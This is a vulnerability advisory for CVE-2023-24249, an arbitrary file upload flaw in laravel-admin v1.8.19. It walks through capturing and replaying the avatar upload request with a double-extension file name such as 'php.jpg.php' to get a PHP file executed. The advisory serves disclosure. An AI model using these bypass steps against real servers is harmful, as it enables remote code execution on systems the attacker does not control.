CVE-2023-24249
laravel-admin is administrative interface builder for laravel which can help you build CRUD backends just with few lines of code.
There is a problem in larravel-admin that allows attackers to bypass file upload restrictions, and attackers can upload files in *. php format for remote code execution.
Suggested description
An arbitrary file upload vulnerability in laravel-admin v1.8.19 allows attackers to execute arbitrary code via a crafted PHP file.
VulnerabilityType Other
File Upload
Vendor of Product
https://github.com/z-song/laravel-admin
Affected Product Code Base
laravel-admin - v1.8.19
Affected Component
There is a problem in larravel-admin that allows attackers to bypass file upload restrictions, and attackers can upload files in *. php format for remote code execution.
Attack Type
Remote
Impact Code execution
true
Details
After logging in to the larravel-admin background, going to the “user settings” (“用户设置”) interface, try to modify the user’s avatar and save it, and then capture the requested data packet.
You can try to upload a php file ending in. jpg extended
Try to modify avatar
Upload .jpg file
After the upload is successful, replay the request and modify the file name of the file upload to “. php”.
e.g.: php.jpg.php
Replay the request
Upload succeeded
Refresh the user setting interface, prompt that the upload was successful, and you can get the address of the php file below.
PHP file is executed
The vulnerability affects the latest version of laravel-admin (v1.8.19).
Others
CVE ID: CVE-2023-24249
Github: https://github.com/z-song/laravel-admin
Official website: https://laravel-admin.org/
Issues page: https://github.com/z-song/laravel-admin/issues/5726